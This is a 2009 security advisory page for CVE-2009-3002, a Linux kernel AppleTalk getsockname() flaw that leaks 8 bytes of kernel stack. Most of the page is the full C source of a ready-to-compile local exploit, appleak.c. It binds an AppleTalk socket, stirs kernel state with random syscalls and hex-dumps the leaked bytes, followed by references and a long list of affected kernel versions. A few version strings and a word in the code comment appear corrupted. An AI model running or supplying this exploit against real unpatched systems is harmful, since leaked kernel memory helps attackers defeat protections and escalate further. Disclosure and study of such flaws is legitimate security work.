 Topic : | Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit
|
SecurityAlert : 6384
CVE : CVE-2009-3002
CWE : CWE-200
SecurityRisk : Medium  (About)
Remote Exploit : No
Local Exploit : Yes
Victim interaction required : No
Exploit Available : Yes
Credit : Clément LECIGNE
Published : 31.08.2009
|
Affected Software : | linux:kernel:2.6.30.4
linux:kernel:2.6.30.5
linux:kernel:2.6.30
linux:kernel:2.6.29.5
linux:kernel:2.6.29.6
linux:kernel:2.6.29.4
linux:kernel:2.6.29.3
linux:kernel:2.6.29.2
linux:kernel:2.6.29.1
linux:kernel:2.6.29
linux:kernel:2.6.28.10
linux:kernel:2.6.28.9
linux:kernel:2.6.28.8
linux:kernel:2.6.28.7
linux:kernel:2.6.28.6
linux:kernel:2.6.28.5
linux:kernel:2.6.28.4
linux:kernel:2.6.28.3
linux:kernel:2.6.28.2
linux:kernel:2.6.28.1
linux:kernel:2.6.28
linux:kernel:2.6.27.31
linux:kernel:2.6.27.30
linux:kernel:2.6.27.29
linux:kernel:2.6.27.28
linux:kernel:2.6.27.27
linux:kernel:2.6.27.26
linux:kernel:2.6.27.25
linux:kernel:2.6.27.24
linux:kernel:2.6.27.23
linux:kernel:2.6.27.22
linux:kernel:2.6.27.21
linux:kernel:2.6.27.20
linux:kernel:2.6.27.19
linux:kernel:2.6.27.18
linux:kernel:2.6.27.17
linux:kernel:2.6.27.16
linux:kernel:2.6.27.15
linux:kernel:2.6.27.14
linux:kernel:2.6.27.13
linux:kernel:2.6.27.12
linux:kernel:2.6.27.11
linux:kernel:2.6.27.10
linux:kernel:2.6.27.9
linux:kernel:2.6.27.8
linux:kernel:2.6.27.7
linux2000:kernel:2.6.27.6
linux:kernel:2.6.27.5
linux:kernel:2.6.27.4
linux:kernel:2.6.27.3
linux:kernel:2.6.27.2
linux:kernel:2.6.27.1
linux:kernel:2.6.27
linux:kernel:2.6.26.8
linux:kernel:2.6.26.7
linux:kernel:2.6.26.6
linux:kernel:2.6.26.5
linux:kernel:2.6.26.4
linux:kernel:2.6.26.3
linux:kernel:2.6.26.2
linux:kernel:2.6.26.1
linux:kernel:2.6.26
linux:kernel:2.6.25.20
linux:kernel:2.6.25.19
linux:kernel:2.6.25.18
linux:kernel:2.6.25.17
linux:kernel:2.6.25.16
linux:kernel:2.6.25.15
linux:kernel:2.6.25.14
linux:kernel:2.6.25.13
linux:kernel:2.6.25.12
linux:kernel:2.6.25.11
linux:kernel:2.6.25.10
linux:kernel:2.6.25.9
linux:kernel:2.6.25.8
linux:kernel:2.6.25.7
linux:kernel:2.6.25.6
linux:kernel:2.6.25.5
linux:kernel:2.6.25.4
linux:kernel:2.6.25.3
linux:kernel:2.6.25.2
linux:kernel:2.6.25.1
linux:kernel:2.6.25
linux:kernel:2.6.24.7
linux:kernel:2.6.24.6
linux:kernel:2.6.24.5
linux:kernel:2.6.24.4
linux:kernel:2.6.24.3
linux:kernel:2.6.24.2
linux:kernel:2.6.24.1
linux:kernel:2.6.24
linux:kernel:2.6.23.17
linux:kernel:2.6.23.16
linux:kernel:2.6.23.15
linux:kernel:2.6.23.14
linux:kernel:2.6.23.13
linux:kernel:2.6.23.12
linux:kernel:2.6.23.11
linux:kernel:2.6.23.10
linux:kernel:2.6.23.9
linux:kernel:2.6.23.8
linux:kernel:2.6.23.7
linux:kernel:2.6.23.6
linux:kernel:2.6.23.5
linux:kernel:2.6.23.4
linux:kernel:2.6.23.3
linux:kernel:2.6.23.2
linux:kernel:2.6.23.1
linux:kernel:2.6.23
linux:kernel:2.6.22.19
linux:kernel:2.6.22.18
linux:kernel:2.6.22.17
linux:kernel:2.6.22.16
linux:kernel:2.6.22.15
linux:kernel:2.6.22.14
linux:kernel:2.6.22.13
linux:kernel:2.6.22.12
linux:kernel:2.6.22.11
linux:kernel:2.6.22.10
linux:kernel:2.6.22.9
linux:kernel:2.6.22.8
linux:kernel:2.6.22.7
linux:kernel:2.6.22.6
linux:kernel:2.6.22.5
linux:kernel:2.6.22.4
linux:kernel:2.6.22.3
linux:kernel:2.6.22.2
linux:kernel:2.6.22.1
linux:kernel:2.6.22
linux:kernel:2.6.21.7
linux:kernel:2.6.21.6
linux:kernel:2.6.21.5
linux:kernel:2.6.21.4
linux:kernel:2.6.21.3
linux:kernel:2.6.21.2
linux:kernel:2.6.21.1
linux:kernel:2.6.21
linux:kernel:2.6.20.21
linux:kernel:2.6.20.20
linux:kernel:2.6.20.19
linux:kernel:2.6.20.18
linux:kernel:2.6.20.17
linux:kernel:2.6.20.16
linux:kernel:2.6.20.15
linux:kernel:2.6.20.14
linux:kernel:2.6.20.13
linux:kernel:2.6.20.12
linux:kernel:2.6.20.11
linux:kernel:2.6.20.10
linux:kernel:2.6.20.9
linux:kernel:2.6.20.8
linux:kernel:2.6.20.7
linux:kernel:2.6.20.6
linux:kernel:2.6.20.5
linux:kernel:2.6.20.4
linux:kernel:2.6.20.3
linux:kernel:2.6.20.2
linux:kern2000el:2.6.20.1
linux:kernel:2.6.20
linux:kernel:2.6.19.7
linux:kernel:2.6.19.6
linux:kernel:2.6.19.5
linux:kernel:2.6.19.4
linux:kernel:2.6.19.3
linux:kernel:2.6.19.2
linux:kernel:2.6.19.1
linux:kernel:2.6.19
linux:kernel:2.6.18.8
linux:kernel:2.6.18.7
linux:kernel:2.6.18.6
linux:kernel:2.6.18.5
linux:kernel:2.6.18.4
linux:kernel:2.6.18.3
linux:kernel:2.6.18.2
linux:kernel:2.6.18.1
linux:kernel:2.6.18
linux:kernel:2.6.17.14
linux:kernel:2.6.17.13
linux:kernel:2.6.17.12
linux:kernel:2.6.17.11
linux:kernel:2.6.17.10
linux:kernel:2.6.17.9
linux:kernel:2.6.17.8
linux:kernel:2.6.17.7
linux:kernel:2.6.17.6
linux:kernel:2.6.17.5
linux:kernel:2.6.17.4
linux:kernel:2.6.17.3
linux:kernel:2.6.17.2
linux:kernel:2.6.17.1
linux:kernel:2.6.17
linux:kernel:2.6.16.62
linux:kernel:2.6.16.61
linux:kernel:2.6.16.60
linux:kernel:2.6.16.59
linux:kernel:2.6.16.58
linux:kernel:2.6.16.57
linux:kernel:2.6.16.56
linux:kernel:2.6.16.55
linux:kernel:2.6.16.54
linux:kernel:2.6.16.53
linux:kernel:2.6.16.52
linux:kernel:2.6.16.51
linux:kernel:2.6.16.50
linux:kernel:2.6.16.49
linux:kernel:2.6.16.48
linux:kernel:2.6.16.47
linux:kernel:2.6.16.46
linux:kernel:2.6.16.45
linux:kernel:2.6.16.44
linux:kernel:2.6.16.43
linux:kernel:2.6.16.42
linux:kernel:2.6.16.41
linux:kernel:2.6.16.40
linux:kernel:2.6.16.39
linux:kernel:2.6.16.38
linux:kernel:2.6.16.37
linux:kernel:2.6.16.36
linux:kernel:2.6.16.35
linux:kernel:2.6.16.34
linux:kernel:2.6.16.33
linux:kernel:2.6.16.32
linux:kernel:2.6.16.31
linux:kernel:2.6.16.30
linux:kernel:2.6.16.29
linux:kernel:2.6.16.28
linux:kernel:2.6.16.27
linux:kernel:2.6.16.26
linux:kernel:2.6.16.25
linux:kernel:2.6.16.24
linux:kernel:2.6.16.23
linux:kernel:2.6.16.22
linux:kernel:2.6.16.21
linux:kernel:2.6.16.20
linux:kernel:2.6.16.19
linux:kernel:2.6.16.18
linux:kernel:2.6.16.17
linux:kernel:2.6.16.16
linux:kernel:2.6.16.15
linux:kernel:2.6.16.14
linux:kernel:2.6.16.13
linux:kernel:2.6.16.12
linux:kernel:2.6.16.11
linux:kernel:2.6.16.10
linux:kernel:2.6.16.9
linux:kernel:2.6.16.8
linux:kernel:2.6.16.7
linux:kernel:2.6.16.6
linux:kernel:2.6.16.5
linux:kernel:2.6.16.4
linux:kernel:2.6.16.3
linux:kernel:2.6.16.2
linux:kernel:2.6.16.1
linux:kernel:2.6.16
linux:kernel:2.6.15.7
linux:kernel:2.6.15.6
linux:kernel:2.6.15.5
linux:kernel:2.6.15
linux:kernel:2.6.15.3
linux:kernel:2.6.15.4
linux:kernel:2.6.15.1
linux:kernel:2.6.15.2
linux:kernel:2.6.14.7
linux:kernel:2.6.14.5
linux:kernel:2.6.14.6
linux:kernel:2.6.14
linux:kernel:2.6.14.3
linux:kernel:2.6.14.4
linux:kernel:2.6.14.1
linux:kernel:2.6.14.2
linux:kernel:2.6.13.5
linux:kernel:2.6.13.3
linux:kernel:2.6.13.4
linux:kernel:2.6.13
linux:kernel:2.6.13.2
linux:kernel:2.6.13.1
linux:kernel:2.6.12.3
linux:kernel:2.6.12.2
linux:kernel:2.6.12.5
linux:kernel:2.6.12.4
linux:kernel:2.6.12.6
linux:kernel:2.6.12.1
linux:kernel:2.6.12
linux:kernel:2.6.11.8
linux:kernel:2.6.11.7
linux:kernel:2.6.11.10
linux:kernel:2.6.11.9
linux:kernel:2.6.11.12
linux:kernel:2.6.11.11
linux:kernel:2.6.11
linux:kernel:2.6.11.1
linux:kernel:2.6.11.2
linux:kernel:2.6.11.3
linux:kernel:2.6.11.4
linux:kernel:2.6.11.5
linux:kernel:2.6.11.6
linux:kernel:2.6.10
linux:kernel:2.6.9
linux:kernel:2.6.8.1
linux:kernel:2.6.8
linux:kernel:2.6.7
linux:kernel:2.6.6
linux:kernel:2.6.5
linux:kernel:2.6.4
linux:kernel:2.6.3
linux:kernel:2.6.2
linux:kernel:2.6.1
linux:kernel:2.6.0
linux:kernel:2.6.30.1 and previous versions
linux:kernel:2.6.31:rc1
linux:kernel:2.6.31:rc2
linux:kernel:2.6.31:rc3
linux:kernel:2.6.31:rc4
linux:kernel:2.6.31:rc5
linux:kernel:2.6.31:rc6
linux:kernel:2.6.31:rc7 and previous versions |
Advisory Content : /**
* appleak.c
*
* Linux keunouille <= 2.6.30
*
* AppleTalk getsockname() 8-bytes kernel stack disclosure
*
*
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h
=3d392475c873c10c10d6d96b94d092a34ebd4791
*
* atalk_getname() can leak 8 bytes of kernel memory to user
*
* [clem1@noe ~]$ ./appleak
* 1e 83 f2 31 ec 56 d7 f6 | ...1.V..
* 00 f4 55 f6 84 2a ca bf | ..U..*..
* 00 f4 55 f6 1e 83 f2 31 | ..U....1
* 1e 83 f2 31 00 60 5e f6 | ...1.`^.
* 00 f4 55 f6 84 2a ca bf | ..U..*..
* c0 2a 54 c0 a8 61 45 f6 | .*T..aE.
* 21 54 12 c0 84 2a ca bf | !T...*..
* (...)
*
* (c) Clément LECIGNE <root[a]clem1.be>
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <net/if_arp.h>
#include <linux/atalk.h>
void kernop(int fd)
{
/* from Jon Oberheide sploit
*/
const int randcalls[] = {
__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat,
__NR_lstat,
__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid,
__NR_getegid,
__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
__NR_sched_getparam, __NR_sched_get_priority_max
};
const int randsopts[] = { SOL_SOCKET, AF_APPLETALK };
int ret, len;
char buf[1024];
do
{
switch ( rand() % 3 )
{
case 0:
ret = syscall(randcalls[rand() %
sizeof(randcalls)/sizeof(randcalls[0])]);
break;
case 1:
len = (rand() % 2) ? sizeof(int) : sizeof(buf);
ret = getsockopt(fd, randsopts[rand() %
sizeof(randsopts)/sizeof(randsopts[0])], rand() % 130, &buf, &len);
break;
case 2:
len = (rand() % 2) ? sizeof(int) : sizeof(buf);
ret = setsockopt(fd, randsopts[rand() %
sizeof(randsopts)/sizeof(randsopts[0])], rand() % 130, &buf, len);
break;
}
}
while ( ret < 0 );
}
void dump( unsigned char * data, unsigned int len )
{
unsigned int dp, p;
const char trans[] =
"................................ !\"#$%&'()*+,-./0123456789"
":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
"nopqrstuvwxyz{|}~...................................."
"....................................................."
"........................................";
for ( dp = 1; dp <= len; dp++ )
{
printf("%02x ", data[dp-1]);
if ( (dp % 8) == 0 )
{
printf("| ");
p = dp;
for ( dp -= 8; dp < p; dp++ ) {
printf("%c", trans[data[dp]]);
}
printf("\n");
}
}
return;
}
int main(void)
{
struct sockaddr_at sat;
int s, len = sizeof(sat), occ = 500;
char prev_zero[sizeof(sat.sat_zero)] = { 0 };
s = socket(AF_APPLETALK, SOCK_DGRAM, 0);
if ( s == -1 )
{
perror("socket");
return EXIT_FAILURE;
}
memset(&sat, 0, sizeof(sat));
sat.sat_family = AF_APPLETALK;
sat.sat_addr.s_net = htons(ATADDR_ANYNET);
sat.sat_addr.s_node = ATADDR_ANYNODE;
sat.sat_port = ATADDR_ANYPORT;
if ( bind(s, (struct sockaddr *) &sat, len) < 0 )
{
perror("bind");
return EXIT_FAILURE;
}
srand(time(NULL) ^ getpid());
while ( --occ )
{
kernop(s);
if ( getsockname(s, (struct sockaddr *) &sat, &len) == 0 )
{
if ( memcmp(sat.sat_zero, prev_zero, sizeof(sat.sat_zero)) != 0
)
{
dump((unsigned char *) &sat.sat_zero,
sizeof(sat.sat_zero));
memcpy(&prev_zero, &sat.sat_zero, sizeof(sat.sat_zero));
usleep(5000);
}
}
}
close(s);
return EXIT_SUCCESS;
}
References :
https://bugzilla.redhat.com/show_bug.cgi?id=519305
http://www.securityfocus.com/bid/36150
http://www.openwall.com/lists/oss-security/2009/08/27/2
http://www.openwall.com/lists/oss-security/2009/08/27/1
http://www.milw0rm.com/exploits/9521
http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.31-rc7
http://secunia.com/advisories/36438
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=f6b97b29513950bfbf621a83d85b6f86b39ec8db
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=e84b90ae5eb3c112d1f208964df1d8156a538289
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=80922bbb12a105f858a8f0abb879cb4302d0ecaa
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=3d392475c873c10c10d6d96b94d092a34ebd4791
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=17ac2e9c58b69a1e25460a568eae1b0dc0188c25
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=09384dfc76e526c3993c09c42e016372dc9dd22c
 Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
- 2011-05-13